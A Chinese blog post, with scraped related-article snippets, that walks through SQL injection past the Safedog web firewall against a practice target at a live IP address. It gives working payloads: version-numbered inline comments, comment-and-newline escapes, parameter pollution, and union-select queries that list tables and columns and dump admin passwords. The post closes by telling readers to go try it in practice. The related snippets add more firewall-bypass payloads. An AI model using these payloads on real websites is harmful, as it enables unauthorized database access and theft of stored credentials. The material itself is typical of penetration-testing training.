sql注入绕狗

最新推荐文章于 2024-08-28 16:35:07 发布
最新推荐文章于 2024-08-28 16:35:07 发布
阅读量402 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MSB_WLAQ/article/details/120573209
版权

sql 系统安全 web安全 安全架构 安全

绕安全狗总结

安全狗靶场

http://59.63.200.79:8014/?id=1

在绕过之前,我需要说明我的注入方法简化说明。

一个注入点我分为六个步骤去完成注入操作:

一、判断是否存在注入

二、当前页面有几个字段,是否有回显

三、利用回显点,遍历表名

四、利用表名,遍历字典

五、输出数据

安全狗绕过

判断是否存在注入

一般来说都是判断and 1=1(2)来判断有无注入点

 

发现有狗狗

这时就要判断狗狗是咬住了哪个词

 

发现是and于是我在这理讲讲绕过狗狗的几个方法:

方式一、

Playload: http://59.63.200.79:8014/?id=1 %23a&a0/*and*/ 1=1 --+

 

返回是正常的

这里讲讲原理:

我们这里是因为and被匹配被咬了但是我们使用aand却不会

所以我们可以用内敛注释把and包起来,然后前面加个a然后把这个a和and分开并且把a给注释掉这样就可以既绕过狗狗也可以执行我们的命令

%23a%0a/*and*/到后端就是这样的:

a #

and

这样可以绕狗

方式二、

Playload: http://59.63.200.79:8014/?id=1 /*!44509and*/ 1=1 --+

也能绕过

原理:

这个绕过是根据mysql数据库版本判断来绕过狗狗

/*!数据库版本+命令*/

当数据库版本大于这个44509(playload里的)时就会去执行后面的命令

这样也可以绕狗

方式三(针对靶场不适用于全部狗狗)、

这个靶场中因为狗狗没有匹配负数而导致的绕过

Playload:http://59.63.200.79:8014/?id=1 and -1=-1 --+

 

方式四(参数污染)、

?Id=1的站点可以尝试?Id=1&id=2 数据库会执行后面的id=2

如果这样会执行成功的话,可以尝试做一些小操作

/*%0a&id=1%20and%20-1=-2%20union%20select%201,password%20from%20admin%23*/

 

注:然后在书上还有phpline和分块传输绕过

这里因为时间原因就不实战了(当然也不知道行不行)

如果想了解更多姿势就百度把哈哈哈

然后我们这边就按照注入流程把他库名啥的爆出来把

 

3的话回显错误所以字段为二

Playload:http://59.63.200.79:8014/?id=1 /*!44509order*/ by 2 --+

 

Playload: http://59.63.200.79:8014/?id=1 and -1=-2 union /*!10044select*/1,2--+(因为这里安全狗匹配的是union select)

三、利用回显点,输出表

payload:and -1=-2 union/*!10044select*/1,table_name--+/*%0afrom information_schema.tables where table_schema=database()%23*/

本行绕过手法用到了内敛注释+版本号和注释符里逃逸

换行=%0a

#=%23

查询到了admin表

 

四、查admin表中到字段

payload:

and -1=-2 union/*!10044select*/1,column_name--+/*%0afrom information_schema.columns where table_schema=database() limit 2,1%23*/

 

五、查password字段数据

and -1=-2 union/*!10044select*/1,password--+/*%0afrom admin%23*/

 

看完记得去实战!!

纸上得来终觉浅,绝知此事要躬行!

白面安全猿
关注
44-5 waf绕过 - SQL注入绕WAF方法
weixin_43263566的博客
06-04 160
内联注释是一种特殊的注释格式,在其后面紧跟着数据库版本号时,如果实际的数据库版本等于或高于该字符串,则应用程序会将注释内容解释为SQL语句,否则将其视为注释处理。默认情况下,如果没有指定版本号,内联注释中的内容将会执行。首先经过测试发现安全狗并不是直接过滤 and 关键字,而是过滤 adn + 一个表达式,如:and 1=1 这种才会被过滤。如果你要使用order by进行爆列,会发现也被过滤了,绕过:使用 group by 绕过。/ 之后的注释内容则会被真正地注释掉,失去作用。
SQL注入绕过技巧
weixin_33970449的博客
07-29 1037
1.绕过空格(注释符/* */,%a0):   两个空格代替一个空格,用Tab代替空格,%a0=空格: %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 最基本的绕过方法,用注释替换空格: /* 注释 */ 使用浮点数: select * from users where id=8E0union select 1,2,...
SQL注入绕过安全狗的waf防火墙,这一篇就够了,8k文案超详细_mysql注入绕waf
最新发布
baimao__Ch的博客
08-28 930
WAF(Web应用防火墙)作为一种专为Web应用程序设计的安全防护工具,其核心功能在于通过实施一系列针对HTTP/HTTPS协议的安全策略,来增强Web应用的安全性。WAF内置了精心设计的检测逻辑与规则集,这些规则旨在对每一个进入系统的请求内容进行细致审查,并对任何违反安全策略的请求采取即时且有效的防御措施,从而维护Web应用环境的纯净与安全。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
sql注入安全狗(官网绕waf)【原创】
weixin_30237281的博客
03-26 473
作者:风之传说 给大家来个全新的过狗的语句。拿官方网站做测试。 众所周知,waf过select , 过 union ,过 from 是最难的。首先我们来看看官网: 来看看基础的and 1=1: 再来个联合查询 union select 1,2,3 可以看到,都会被拦截。由于此文不是装逼文,我们就不讲如何一步步进行突破了。我直接给出语句吧:%''union+/*!50000%53...
SQL注入-绕过安全
LJH1999ZN的博客
02-15 5093
绕过安全狗的常见四种方式 id=1'/*!44444order*/ /*!44444by*/3--+
SQL注入绕过安全
blackguest07的博客
01-12 2454
SQL注入绕过安全狗,内容很详细,本文仅供学习,请勿做一些非法事情,出事与博主无关。
SQL注入 安全狗apache主程序版本v4.0.23137 绕过1
08-03
以下是一些具体的SQL注入攻击技术和绕过策略: 1. **注释符利用**:攻击者在SQL语句中插入多层注释符,如`/*//------/*/`,来隐藏或分割查询部分,以避开安全狗的检测。例如,`order by 1%27%20order%20/*//------/...
sql注入绕过安全狗4.0
Bu2n的博客
02-07 5567
1.前言2.前置知识3.绕过关键字主要思路3.1绕过连体关键字思路3.2绕过单个关键字思路4.以sqli-labs(Less-1)为例,绕过安全狗4.1拦截order by4.2拦截union select4.3拦截database()4.4拦截from4.5拦截and4.6查看数据库数据5.面向安全狗4.0的py脚本6.sqli-labs无安全狗全通关payload 1.前言 该文章只进行技术分享与探讨,任何人进行非法操作与作者无关。 2.前置知识 /*!*/叫做内联注释,当!后面所接的数据库版本号时.
安全狗3.5版本SQL注入绕过
恢弘志士的博客
07-19 455
环境搭建: phpstudy+sqli-labs-master 安全狗版本: 出现问题:新版安全狗Apache服务无法启动问题 管理员模式启动cmd,进入phpstudy部署目录phpstudy_pro\Extensions\Apache2.4.39\bin下 执行命令:httpd -k install -n apache2.4 环境搭建完毕,验证安全狗正常拦截开搞开搞!!! 从上面验证看来就是针对union 和select的组合进行拦截 按照B站小迪师傅搞了半天不行,想想应该是.
SQL注入与绕过WAF
qq_66291050的博客
05-27 376
14400and*/ 1=1,也行,内联注入14400是版本号,大于或等于这个版本号是有意义的,否则没有用。迪总这时候CTRL C+V搞的注入语句,特殊符号是URL编码的,但是迪总把编码还原了之后我们可以发现是被拦截了的,这还是一个玄学问题,哈。根据迪总的说法是宝塔,之类的,比较难,要一步一个脚印,先吃下酒菜,那就是安全狗,先把简单的绕过,困难的就慢慢来。/***/这么写,安全狗是不会对其检测的,不理解的话,我们来看看MYSQL数据库中是怎么理解这段语句的。很成功的绕过了,是吧,那么显存位是1,2,3。
SQL注入 安全狗绕过
iO快到碗里来
09-24 383
0x00 前言 最近看了几篇关于安全狗 Bypass 的文章,绕过方式五花八门。在此以安全狗 apache4.0.30255 为例,简单做个总结。 0x01 相关知识 /* … */ 在大部分语言中都是一种注释,处于 /* … */ 之中的语句是不被执行的。但 MySQL 为了保证兼容性,比如要求从 mysqldump 导出的 SQL 语句能被其它数据库直接使用,它把一些特有的仅在 MySQL 上能执行的语句放在 /*! … */ 中,这样这些语句在其它数据库中就不会被当作执行语句,但在 MySQL
安全SQL注入绕过
qq_38675102的博客
02-09 2687
安全狗waf绕过
SQL注入之打狗棒法(安全狗绕过)
快吃小蛋糕吧的博客
10-28 1344
最近在网上挖洞时,总会遇到烦人的安全狗,研究了一天发现绕过安全狗出奇的简单,只需要语法犀利即可。 前言: 相信在网络上做渗透测试时,总会遇到如下情况: 这是网站管理员在服务器上安装了安全狗,安全狗是一款集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具。功能涵盖了网马/木马扫描、防SQL注入、防盗链、防CC攻击、网站流量实时监控、网站CPU监控、下载线程保护、IP黑白名单管理、网页防篡改功能(结合安全狗云安全中心使用)等模块。能够为用户提供实时的网站安全防护,避免各类针对网站的攻击所带.
SQL注入绕过安全狗的五种方法
01-11 1393
2,输入 1’ or 1 and 1 --+ (意思是闭合参数tel的单引号,or 1 and 1 让条件结果为真,无论1是否存在都会返回数据,–+ 闭合后面的其他语句)回显页面正常。有我们必火的小女生好看吗?–:表示注释,在mysql中真正的注释是"-- ",这里必须有个空格,否则不是注释,%0a是换行的url编码,换号后,表示重新查询,前面的注释对后面的语句将不再影响,这也要注意,这里红色框处,当url参数出现两个同名参数时,将取最后一个参数的值,所以这里会取后面的tel的值,前面传参/
安全狗之绕过注入
xiuzhentianting的博客
09-14 1666
?ArticleID=371 a%nd (select top 1 asc(mid(UserName,1,1)) f%rom Manage_User)=97 也就是加了一些百分号 说明不能完全依赖第三方的安全软件,关键还是写代码要注意。
绕过安全狗(Apache 4.0.30255)——SQL注入(上)
m0_51330619的博客
09-23 1080
4.0.30255 首先测试是否是注入点 这里应该是and被过滤了 尝试用大小写与双写都不行,想想也是,安全狗也没那么笨 然后尝试用&&代替and 于是乎就成功判断出注入点咯,接下来order by判断列数 1' order by 3# 判断为2列,于是union联合注入查询咯 1' union select 1,2# 被拦截了奥,现在需要找到是什么函数被拦截了 1’ union # 不拦截 1’ select 1,2# 不拦截 1’ un
mysql特性绕过安全狗_绕过安全狗新版进行SQL注入
weixin_39641738的博客
02-28 209
前言在圈子见到某师傅过了安全狗然后注入,然后自己手痒也搭了个环境进行测试。期间搭建环境各种坑….不过后面还是有个不错的结果的正文首先我是用phpstudy+安全狗4.0搭建的环境一开始找不到apache名称,按照网上的来整也不行(一堆重复的沙雕)解决方法:以管理员权限运行cmd,进入apache/bin目录httpd -k install -n apache2.4以管理员权限运行cmd,进入mys...
绕过SQL注入安全狗4.0的实战挑战
3. **SQL注入绕过策略**: 文档的重点可能在于如何利用SQL注入技术来避开这种验证机制。例如,攻击者可能会尝试使用SQL注解,如`' OR 1=1; --`,将条件变成永远为真的表达式,使得空密码也能通过验证。另一种方法可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值